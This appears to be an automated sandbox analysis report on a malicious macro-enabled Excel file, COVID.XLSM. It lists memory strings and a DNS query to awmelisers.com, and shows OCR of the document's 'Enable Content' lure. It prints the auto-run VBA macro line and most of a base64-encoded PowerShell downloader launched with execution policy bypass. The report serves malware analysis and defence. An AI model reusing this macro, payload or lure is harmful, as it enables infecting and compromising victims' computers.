Source: powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://cortana.ai
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://cortana.ai/api
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://cr.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://dev.cortana.ai
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://devnull.onenote.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://directory.services.
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000006.00000002.714883789.000002E1E2D1E000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000006.00000002.725312158.000002E1E45EF000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.728979309.000002E1FAEBD000.00000004.00000001.sdmpString found in binary or memory: https://go.microsoft.co
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://graph.windows.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://graph.windows.net/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://lifecycle.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://login.windows.local
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://management.azure.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://management.azure.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://messaging.office.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://ncus.contentsync.
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000006.00000002.725636008.000002E1F2B74000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://officeapps.live.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://onedrive.live.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://osi.office.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://outlook.office.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://outlook.office365.com/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://powerlift.acompli.net
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://roaming.edog.
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://settings.outlook.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://staging.cortana.ai
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://tasks.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://webshell.suite.office.com
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://wus2.contentsync.
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: BF4B57C3-D181-4204-9680-790D8457BA20.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownDNS traffic detected: queries for: awmelisers.com

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing" to unlock the editing document c 7 8 9 0 Protected View This file originated fro
Source: Screenshot number: 4Screenshot OCR: Enable Content" to perform Microsoft Ofhce Decrypti 17 decryption of the document 1 18 19 20 0
Source: Document image extraction number: 0Screenshot OCR: Enable Editing' to unlock the editing document downloaded from the Internet ' il S Protected View
Source: Document image extraction number: 0Screenshot OCR: Enable Content" to perform Microsoft Office Decryption Core to start the decryption of the document
Source: Document image extraction number: 1Screenshot OCR: Enable Editing" to unlock the editing document downloaded from the Internet ' jJ C) Protected View
Source: Document image extraction number: 1Screenshot OCR: Enable Content" to perform Microsoft Office Decryption Core to start the decryption of the document
Document contains an embedded VBA macro which may execute processesShow sources
Source: COVID.XLSMOLE, VBA macro line: Set objConfig = objStartup.SpawnInstance_
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 3581
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3569
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3569Jump to behavior
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: COVID.XLSMOLE, VBA macro line: strstr = "cmd.exe /c ""powershell -ExecutionPolicy BypasS -ENC " + StrConv(Decode64(XUN_Status_IIWSY()), vbFromUnicode) + """"
Source: COVID.XLSMOLE, VBA macro line: strstr = "cmd.exe /c ""powershell -ExecutionPolicy BypasS -ENC " + StrConv(Decode64(XUN_Status_IIWSY()), vbFromUnicode) + """"
Source: Process Memory Space: powershell.exe PID: 5860, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFA36020DAA6_2_00007FFA36020DAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFA36020CA86_2_00007FFA36020CA8
Source: COVID.XLSMOLE, VBA macro line: Private Sub Workbook_Open()
Source: COVID.XLSMOLE indicator, VBA macros: true
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 'powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQA
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHU